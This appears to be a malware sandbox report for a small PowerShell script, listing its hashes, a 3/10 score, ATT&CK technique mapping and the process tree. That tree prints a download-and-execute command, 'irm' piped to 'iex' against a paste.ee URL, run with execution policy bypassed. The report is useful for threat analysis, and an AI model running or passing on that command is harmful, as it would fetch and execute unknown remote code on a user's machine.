79a0a92cd82c5a3b0d3e8c72d1acbec46ac9677797cf751584ef5fb838e5b0ec

Analysis

max time kernel
78s
max time network
17s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/03/2025, 22:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

50B
MD5

a842bb38fa14cb90a9a3169e0da00d0e
SHA1

d8541bd2cfb386294b24c4c4e68eba269cbffcd9
SHA256

79a0a92cd82c5a3b0d3e8c72d1acbec46ac9677797cf751584ef5fb838e5b0ec
SHA512

a068a2d4945f38fdd4165089679593b60bc594bb993c0c61f3c08b6b9496f695d847f7f970793a46eaf33ffe80fd93cc3dbee889f471368b6c8bac36a0df9048

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2420	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2420	powershell.exe
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 2832	2420	powershell.exe	31
PID 2420 wrote to memory of 2832	2420	powershell.exe	31
PID 2420 wrote to memory of 2832	2420	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/xkhQqMbj | iex"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f8ed1978048a2182cadbd4077d980618

SHA1
8f842a5edf559771bc4b726858514da76f41fc94

SHA256
f983093bf28c19c4653e0d65a3ea66d0520eddd3db95ef7b8343c76acec0b9b0

SHA512
999e4d57ea9a1b0bcb76b8cb66c9cfd6eb2aeb88a5487c91dcd4b0d16704a86b595ed84a2fbb47008e388a19288615723eb03b0cc4cfb0359a7f92911f98e81e

Download Submit
memory/2420-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

Filesize
4KB

Download
memory/2420-5-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2420-6-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2420-7-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-17-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-15-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-16-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download